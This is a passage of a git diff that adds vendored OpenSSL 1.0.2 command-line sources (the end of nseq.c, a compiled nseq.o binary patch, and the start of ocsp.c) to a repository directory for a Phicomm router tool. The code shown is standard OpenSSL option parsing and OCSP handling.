+        goto end;
+    }
+
+    for (i = 0; i < sk_X509_num(seq->certs); i++) {
+        x509 = sk_X509_value(seq->certs, i);
+        dump_cert_text(out, x509);
+        PEM_write_bio_X509(out, x509);
+    }
+    ret = 0;
+ end:
+    BIO_free(in);
+    BIO_free_all(out);
+    NETSCAPE_CERT_SEQUENCE_free(seq);
+
+    OPENSSL_EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/nseq.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/nseq.o
new file mode 100644
index 0000000000000000000000000000000000000000..4fc114e82a29441501a3d60232300b38bfae3c52
GIT binary patch
literal 5688
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
Le<%7P#c%%)DFB$I

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ocsp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ocsp.c
new file mode 100644
index 0000000..ebb3732
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ocsp.c
@@ -0,0 +1,1364 @@
+/* ocsp.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef OPENSSL_NO_OCSP
+
+# ifdef OPENSSL_SYS_VMS
+#  define _XOPEN_SOURCE_EXTENDED/* So fd_set and friends get properly defined
+                                 * on OpenVMS */
+# endif
+
+# define USE_SOCKETS
+
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+# include <time.h>
+# include "apps.h"              /* needs to be included before the openssl
+                                 * headers! */
+# include <openssl/e_os2.h>
+# include <openssl/crypto.h>
+# include <openssl/err.h>
+# include <openssl/ssl.h>
+# include <openssl/evp.h>
+# include <openssl/bn.h>
+# include <openssl/x509v3.h>
+
+# if defined(NETWARE_CLIB)
+#  ifdef NETWARE_BSDSOCK
+#   include <sys/socket.h>
+#   include <sys/bsdskt.h>
+#  else
+#   include <novsock2.h>
+#  endif
+# elif defined(NETWARE_LIBC)
+#  ifdef NETWARE_BSDSOCK
+#   include <sys/select.h>
+#  else
+#   include <novsock2.h>
+#  endif
+# endif
+
+/* Maximum leeway in validity period: default 5 minutes */
+# define MAX_VALIDITY_PERIOD     (5 * 60)
+
+static int add_ocsp_cert(OCSP_REQUEST **req, X509 *cert,
+                         const EVP_MD *cert_id_md, X509 *issuer,
+                         STACK_OF(OCSP_CERTID) *ids);
+static int add_ocsp_serial(OCSP_REQUEST **req, char *serial,
+                           const EVP_MD *cert_id_md, X509 *issuer,
+                           STACK_OF(OCSP_CERTID) *ids);
+static int print_ocsp_summary(BIO *out, OCSP_BASICRESP *bs, OCSP_REQUEST *req,
+                              STACK_OF(OPENSSL_STRING) *names,
+                              STACK_OF(OCSP_CERTID) *ids, long nsec,
+                              long maxage);
+
+static int make_ocsp_response(OCSP_RESPONSE **resp, OCSP_REQUEST *req,
+                              CA_DB *db, X509 *ca, X509 *rcert,
+                              EVP_PKEY *rkey, const EVP_MD *md,
+                              STACK_OF(X509) *rother, unsigned long flags,
+                              int nmin, int ndays, int badsig);
+
+static char **lookup_serial(CA_DB *db, ASN1_INTEGER *ser);
+static BIO *init_responder(const char *port);
+static int do_responder(OCSP_REQUEST **preq, BIO **pcbio, BIO *acbio,
+                        const char *port);
+static int send_ocsp_response(BIO *cbio, OCSP_RESPONSE *resp);
+static OCSP_RESPONSE *query_responder(BIO *err, BIO *cbio, const char *path,
+                                      const STACK_OF(CONF_VALUE) *headers,
+                                      OCSP_REQUEST *req, int req_timeout);
+
+# undef PROG
+# define PROG ocsp_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    char **args;
+    char *host = NULL, *port = NULL, *path = "/";
+    char *thost = NULL, *tport = NULL, *tpath = NULL;
+    char *reqin = NULL, *respin = NULL;
+    char *reqout = NULL, *respout = NULL;
+    char *signfile = NULL, *keyfile = NULL;
+    char *rsignfile = NULL, *rkeyfile = NULL;
+    char *outfile = NULL;
+    int add_nonce = 1, noverify = 0, use_ssl = -1;
+    STACK_OF(CONF_VALUE) *headers = NULL;
+    OCSP_REQUEST *req = NULL;
+    OCSP_RESPONSE *resp = NULL;
+    OCSP_BASICRESP *bs = NULL;
+    X509 *issuer = NULL, *cert = NULL;
+    X509 *signer = NULL, *rsigner = NULL;
+    EVP_PKEY *key = NULL, *rkey = NULL;
+    BIO *acbio = NULL, *cbio = NULL;
+    BIO *derbio = NULL;
+    BIO *out = NULL;
+    int req_timeout = -1;
+    int req_text = 0, resp_text = 0;
+    long nsec = MAX_VALIDITY_PERIOD, maxage = -1;
+    char *CAfile = NULL, *CApath = NULL;
+    X509_STORE *store = NULL;
+    X509_VERIFY_PARAM *vpm = NULL;
+    STACK_OF(X509) *sign_other = NULL, *verify_other = NULL, *rother = NULL;
+    char *sign_certfile = NULL, *verify_certfile = NULL, *rcertfile = NULL;
+    unsigned long sign_flags = 0, verify_flags = 0, rflags = 0;
+    int ret = 1;
+    int accept_count = -1;
+    int badarg = 0;
+    int badsig = 0;
+    int i;
+    int ignore_err = 0;
+    STACK_OF(OPENSSL_STRING) *reqnames = NULL;
+    STACK_OF(OCSP_CERTID) *ids = NULL;
+
+    X509 *rca_cert = NULL;
+    char *ridx_filename = NULL;
+    char *rca_filename = NULL;
+    CA_DB *rdb = NULL;
+    int nmin = 0, ndays = -1;
+    const EVP_MD *cert_id_md = NULL, *rsign_md = NULL;
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+    SSL_load_error_strings();
+    OpenSSL_add_ssl_algorithms();
+    args = argv + 1;
+    reqnames = sk_OPENSSL_STRING_new_null();
+    ids = sk_OCSP_CERTID_new_null();
+    while (!badarg && *args && *args[0] == '-') {
+        if (!strcmp(*args, "-out")) {
+            if (args[1]) {
+                args++;
+                outfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-timeout")) {
+            if (args[1]) {
+                args++;
+                req_timeout = atol(*args);
+                if (req_timeout < 0) {
+                    BIO_printf(bio_err, "Illegal timeout value %s\n", *args);
+                    badarg = 1;
+                }
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-url")) {
+            if (thost)
+                OPENSSL_free(thost);
+            if (tport)
+                OPENSSL_free(tport);
+            if (tpath)
+                OPENSSL_free(tpath);
+            if (args[1]) {
+                args++;
+                if (!OCSP_parse_url(*args, &host, &port, &path, &use_ssl)) {
+                    BIO_printf(bio_err, "Error parsing URL\n");
+                    badarg = 1;
+                }
+                thost = host;
+                tport = port;
+                tpath = path;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-host")) {
+            if (args[1]) {
+                args++;
+                host = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-port")) {
+            if (args[1]) {
+                args++;
+                port = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-header")) {
+            if (args[1] && args[2]) {
+                if (!X509V3_add_value(args[1], args[2], &headers))
+                    goto end;
+                args += 2;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-ignore_err"))
+            ignore_err = 1;
+        else if (!strcmp(*args, "-noverify"))
+            noverify = 1;
+        else if (!strcmp(*args, "-nonce"))
+            add_nonce = 2;
+        else if (!strcmp(*args, "-no_nonce"))
+            add_nonce = 0;
+        else if (!strcmp(*args, "-resp_no_certs"))
+            rflags |= OCSP_NOCERTS;
+        else if (!strcmp(*args, "-resp_key_id"))
+            rflags |= OCSP_RESPID_KEY;
+        else if (!strcmp(*args, "-no_certs"))
+            sign_flags |= OCSP_NOCERTS;
+        else if (!strcmp(*args, "-no_signature_verify"))
+            verify_flags |= OCSP_NOSIGS;
+        else if (!strcmp(*args, "-no_cert_verify"))
+            verify_flags |= OCSP_NOVERIFY;
+        else if (!strcmp(*args, "-no_chain"))
+            verify_flags |= OCSP_NOCHAIN;
+        else if (!strcmp(*args, "-no_cert_checks"))
+            verify_flags |= OCSP_NOCHECKS;
+        else if (!strcmp(*args, "-no_explicit"))
+            verify_flags |= OCSP_NOEXPLICIT;
+        else if (!strcmp(*args, "-trust_other"))
+            verify_flags |= OCSP_TRUSTOTHER;
+        else if (!strcmp(*args, "-no_intern"))
+            verify_flags |= OCSP_NOINTERN;
+        else if (!strcmp(*args, "-badsig"))
+            badsig = 1;
+        else if (!strcmp(*args, "-text")) {
+            req_text = 1;
+            resp_text = 1;
+        } else if (!strcmp(*args, "-req_text"))
+            req_text = 1;
+        else if (!strcmp(*args, "-resp_text"))
+            resp_text = 1;
+        else if (!strcmp(*args, "-reqin")) {
+            if (args[1]) {
+                args++;
+                reqin = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-respin")) {
+            if (args[1]) {
+                args++;
+                respin = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-signer")) {
+            if (args[1]) {
+                args++;
+                signfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-VAfile")) {
+            if (args[1]) {
+                args++;
+                verify_certfile = *args;
+                verify_flags |= OCSP_TRUSTOTHER;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-sign_other")) {
+            if (args[1]) {
+                args++;
+                sign_certfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-verify_other")) {
+            if (args[1]) {
+                args++;
+                verify_certfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-CAfile")) {
+            if (args[1]) {
+                args++;
+                CAfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-CApath")) {
+            if (args[1]) {
+                args++;
+                CApath = *args;
+            } else
+                badarg = 1;
+        } else if (args_verify(&args, NULL, &badarg, bio_err, &vpm)) {
+            if (badarg)
+                goto end;
+            continue;
+        } else if (!strcmp(*args, "-validity_period")) {
+            if (args[1]) {
+                args++;
+                nsec = atol(*args);
+                if (nsec < 0) {
+                    BIO_printf(bio_err,
+                               "Illegal validity period %s\n", *args);
+                    badarg = 1;
+                }
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-status_age")) {
+            if (args[1]) {
+                args++;
+                maxage = atol(*args);
+                if (maxage < 0) {
+                    BIO_printf(bio_err, "Illegal validity age %s\n", *args);
+                    badarg = 1;
+                }
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-signkey")) {
+            if (args[1]) {
+                args++;
+                keyfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-reqout")) {
+            if (args[1]) {
+                args++;
+                reqout = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-respout")) {
+            if (args[1]) {
+                args++;
+                respout = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-path")) {
+            if (args[1]) {
+                args++;
+                path = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-issuer")) {
+            if (args[1]) {
+                args++;
+                X509_free(issuer);
+                issuer = load_cert(bio_err, *args, FORMAT_PEM,
+                                   NULL, e, "issuer certificate");
+                if (!issuer)
+                    goto end;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-cert")) {
+            if (args[1]) {
+                args++;
+                X509_free(cert);
+                cert = load_cert(bio_err, *args, FORMAT_PEM,
+                                 NULL, e, "certificate");
+                if (!cert)
+                    goto end;
+                if (!cert_id_md)
+                    cert_id_md = EVP_sha1();
+                if (!add_ocsp_cert(&req, cert, cert_id_md, issuer, ids))
+                    goto end;
+                if (!sk_OPENSSL_STRING_push(reqnames, *args))
+                    goto end;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-serial")) {
+            if (args[1]) {
+                args++;
+                if (!cert_id_md)
+                    cert_id_md = EVP_sha1();
+                if (!add_ocsp_serial(&req, *args, cert_id_md, issuer, ids))
+                    goto end;
+                if (!sk_OPENSSL_STRING_push(reqnames, *args))
+                    goto end;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-index")) {
+            if (args[1]) {
+                args++;
+                ridx_filename = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-CA")) {
+            if (args[1]) {
+                args++;
+                rca_filename = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-nmin")) {
+            if (args[1]) {
+                args++;
+                nmin = atol(*args);
+                if (nmin < 0) {
+                    BIO_printf(bio_err, "Illegal update period %s\n", *args);
+                    badarg = 1;
+                }
+            }
+            if (ndays == -1)
+                ndays = 0;
+            else
+                badarg = 1;
+        } else if (!strcmp(*args, "-nrequest")) {
+            if (args[1]) {
+                args++;
+                accept_count = atol(*args);
+                if (accept_count < 0) {
+                    BIO_printf(bio_err, "Illegal accept count %s\n", *args);
+                    badarg = 1;
+                }
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-ndays")) {
+            if (args[1]) {
+                args++;
+                ndays = atol(*args);
+                if (ndays < 0) {
+                    BIO_printf(bio_err, "Illegal update period %s\n", *args);
+                    badarg = 1;
+                }
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-rsigner")) {
+            if (args[1]) {
+                args++;
+                rsignfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-rkey")) {
+            if (args[1]) {
+                args++;
+                rkeyfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-rother")) {
+            if (args[1]) {
+                args++;
+                rcertfile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-rmd")) {
+            if (args[1]) {
+                args++;
+                rsign_md = EVP_get_digestbyname(*args);
+                if (!rsign_md)
+                    badarg = 1;
+            } else
+                badarg = 1;
+        } else if ((cert_id_md = EVP_get_digestbyname((*args) + 1)) == NULL) {
+            badarg = 1;
+        }
+        args++;
+    }
+
+    /* Have we anything to do? */
+    if (!req && !reqin && !respin && !(port && ridx_filename))
+        badarg = 1;
+
+    if (badarg) {
+        BIO_printf(bio_err, "OCSP utility\n");
+        BIO_printf(bio_err, "Usage ocsp [options]\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-out file            output filename\n");
+        BIO_printf(bio_err, "-issuer file         issuer certificate\n");
+        BIO_printf(bio_err, "-cert file           certificate to check\n");
+        BIO_printf(bio_err, "-serial n            serial number to check\n");
+        BIO_printf(bio_err,
+                   "-signer file         certificate to sign OCSP request with\n");
+        BIO_printf(bio_err,
+                   "-signkey file        private key to sign OCSP request with\n");
+        BIO_printf(bio_err,
+                   "-sign_other file     additional certificates to include in signed request\n");
+        BIO_printf(bio_err,
+                   "-no_certs            don't include any certificates in signed request\n");
+        BIO_printf(bio_err,
+                   "-req_text            print text form of request\n");
+        BIO_printf(bio_err,
+                   "-resp_text           print text form of response\n");
+        BIO_printf(bio_err,
+                   "-text                print text form of request and response\n");
+        BIO_printf(bio_err,
+                   "-reqout file         write DER encoded OCSP request to \"file\"\n");
+        BIO_printf(bio_err,
+                   "-respout file        write DER encoded OCSP reponse to \"file\"\n");
+        BIO_printf(bio_err,
+                   "-reqin file          read DER encoded OCSP request from \"file\"\n");
+        BIO_printf(bio_err,
+                   "-respin file         read DER encoded OCSP reponse from \"file\"\n");
+        BIO_printf(bio_err,
+                   "-nonce               add OCSP nonce to request\n");
+        BIO_printf(bio_err,
+                   "-no_nonce            don't add OCSP nonce to request\n");
+        BIO_printf(bio_err, "-url URL             OCSP responder URL\n");
+        BIO_printf(bio_err,
+                   "-host host:n         send OCSP request to host on port n\n");
+        BIO_printf(bio_err,
+                   "-path                path to use in OCSP request\n");
+        BIO_printf(bio_err,
+                   "-CApath dir          trusted certificates directory\n");
+        BIO_printf(bio_err,
+                   "-CAfile file         trusted certificates file\n");
+        BIO_printf(bio_err,
+                   "-VAfile file         validator certificates file\n");
+        BIO_printf(bio_err,
+                   "-validity_period n   maximum validity discrepancy in seconds\n");
+        BIO_printf(bio_err,
+                   "-status_age n        maximum status age in seconds\n");
+        BIO_printf(bio_err,
+                   "-noverify            don't verify response at all\n");
+        BIO_printf(bio_err,
+                   "-verify_other file   additional certificates to search for signer\n");
+        BIO_printf(bio_err,
+                   "-trust_other         don't verify additional certificates\n");
+        BIO_printf(bio_err,
+                   "-no_intern           don't search certificates contained in response for signer\n");
+        BIO_printf(bio_err,
+                   "-no_signature_verify don't check signature on response\n");
+        BIO_printf(bio_err,
+                   "-no_cert_verify      don't check signing certificate\n");
+        BIO_printf(bio_err,
+                   "-no_chain            don't chain verify response\n");
+        BIO_printf(bio_err,
+                   "-no_cert_checks      don't do additional checks on signing certificate\n");
+        BIO_printf(bio_err,
+                   "-port num            port to run responder on\n");
+        BIO_printf(bio_err,
+                   "-index file          certificate status index file\n");
+        BIO_printf(bio_err, "-CA file             CA certificate\n");
+        BIO_printf(bio_err,
+                   "-rsigner file        responder certificate to sign responses with\n");
+        BIO_printf(bio_err,
+                   "-rkey file           responder key to sign responses with\n");
+        BIO_printf(bio_err,
+                   "-rother file         other certificates to include in response\n");
+        BIO_printf(bio_err,
+                   "-resp_no_certs       don't include any certificates in response\n");
+        BIO_printf(bio_err,
+                   "-nmin n              number of minutes before next update\n");
+        BIO_printf(bio_err,
+                   "-ndays n             number of days before next update\n");
+        BIO_printf(bio_err,
+                   "-resp_key_id         identify reponse by signing certificate key ID\n");
+        BIO_printf(bio_err,
+                   "-nrequest n          number of requests to accept (default unlimited)\n");
+        BIO_printf(bio_err,
+                   "-<dgst alg>          use specified digest in the request\n");
+        BIO_printf(bio_err,
+                   "-timeout n           timeout connection to OCSP responder after n seconds\n");
+        goto end;
+    }
+
+    if (outfile)
+        out = BIO_new_file(outfile, "w");
+    else
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+
+    if (!out) {
+        BIO_printf(bio_err, "Error opening output file\n");
+        goto end;
+    }
+
+    if (!req && (add_nonce != 2))
+        add_nonce = 0;
+
+    if (!req && reqin) {
+        if (!strcmp(reqin, "-"))
+            derbio = BIO_new_fp(stdin, BIO_NOCLOSE);
+        else
+            derbio = BIO_new_file(reqin, "rb");
+        if (!derbio) {
+            BIO_printf(bio_err, "Error Opening OCSP request file\n");
+            goto end;
+        }
+        req = d2i_OCSP_REQUEST_bio(derbio, NULL);
+        BIO_free(derbio);
+        if (!req) {
+            BIO_printf(bio_err, "Error reading OCSP request\n");
+            goto end;
+        }
+    }
+
+    if (!req && port) {
+        acbio = init_responder(port);
+        if (!acbio)
+            goto end;
+    }
+
+    if (rsignfile && !rdb) {
+        if (!rkeyfile)
+            rkeyfile = rsignfile;
+        rsigner = load_cert(bio_err, rsignfile, FORMAT_PEM,
+                            NULL, e, "responder certificate");
+        if (!rsigner) {
+            BIO_printf(bio_err, "Error loading responder certificate\n");
+            goto end;
+        }
+        rca_cert = load_cert(bio_err, rca_filename, FORMAT_PEM,
+                             NULL, e, "CA certificate");
+        if (rcertfile) {
+            rother = load_certs(bio_err, rcertfile, FORMAT_PEM,
+                                NULL, e, "responder other certificates");
+            if (!rother)
+                goto end;
+        }
+        rkey = load_key(bio_err, rkeyfile, FORMAT_PEM, 0, NULL, NULL,
+                        "responder private key");
+        if (!rkey)
+            goto end;
+    }
+    if (acbio)
+        BIO_printf(bio_err, "Waiting for OCSP client connections...\n");
+
+ redo_accept:
+
+    if (acbio) {
+        if (!do_responder(&req, &cbio, acbio, port))
+            goto end;
+        if (!req) {
+            resp =
+                OCSP_response_create(OCSP_RESPONSE_STATUS_MALFORMEDREQUEST,
+                                     NULL);
+            send_ocsp_response(cbio, resp);
+            goto done_resp;
+        }
+    }
+
+    if (!req && (signfile || reqout || host || add_nonce || ridx_filename)) {
+        BIO_printf(bio_err, "Need an OCSP request for this operation!\n");
+        goto end;
+    }
+
+    if (req && add_nonce)
+        OCSP_request_add1_nonce(req, NULL, -1);
+
+    if (signfile) {
+        if (!keyfile)
+            keyfile = signfile;
+        signer = load_cert(bio_err, signfile, FORMAT_PEM,
+                           NULL, e, "signer certificate");
+        if (!signer) {
+            BIO_printf(bio_err, "Error loading signer certificate\n");
+            goto end;
+        }
+        if (sign_certfile) {
+            sign_other = load_certs(bio_err, sign_certfile, FORMAT_PEM,
+                                    NULL, e, "signer certificates");
+            if (!sign_other)
+                goto end;
+        }
+        key = load_key(bio_err, keyfile, FORMAT_PEM, 0, NULL, NULL,
+                       "signer private key");
+        if (!key)
+            goto end;
+
+        if (!OCSP_request_sign
+            (req, signer, key, NULL, sign_other, sign_flags)) {
+            BIO_printf(bio_err, "Error signing OCSP request\n");
+            goto end;
+        }
+    }
+
+    if (req_text && req)
+        OCSP_REQUEST_print(out, req, 0);
+
+    if (reqout) {
+        if (!strcmp(reqout, "-"))
+            derbio = BIO_new_fp(stdout, BIO_NOCLOSE);
+        else
+            derbio = BIO_new_file(reqout, "wb");
+        if (!derbio) {
+            BIO_printf(bio_err, "Error opening file %s\n", reqout);
+            goto end;
+        }
+        i2d_OCSP_REQUEST_bio(derbio, req);
+        BIO_free(derbio);
+    }
+
+    if (ridx_filename && (!rkey || !rsigner || !rca_cert)) {
+        BIO_printf(bio_err,
+                   "Need a responder certificate, key and CA for this operation!\n");
+        goto end;
+    }
+
+    if (ridx_filename && !rdb) {
+        rdb = load_index(ridx_filename, NULL);
+        if (!rdb)
+            goto end;
+        if (!index_index(rdb))
+            goto end;
+    }
+
+    if (rdb) {
+        i = make_ocsp_response(&resp, req, rdb, rca_cert, rsigner, rkey,
+                               rsign_md, rother, rflags, nmin, ndays, badsig);
+        if (cbio)
+            send_ocsp_response(cbio, resp);
+    } else if (host) {
+# ifndef OPENSSL_NO_SOCK
+        resp = process_responder(bio_err, req, host, path,
+                                 port, use_ssl, headers, req_timeout);
+        if (!resp)
+            goto end;
+# else
+        BIO_printf(bio_err,
+                   "Error creating connect BIO - sockets not supported.\n");
+        goto end;
+# endif
+    } else if (respin) {
+        if (!strcmp(respin, "-"))
+            derbio = BIO_new_fp(stdin, BIO_NOCLOSE);
+        else
+            derbio = BIO_new_file(respin, "rb");
+        if (!derbio) {
+            BIO_printf(bio_err, "Error Opening OCSP response file\n");
+            goto end;
+        }
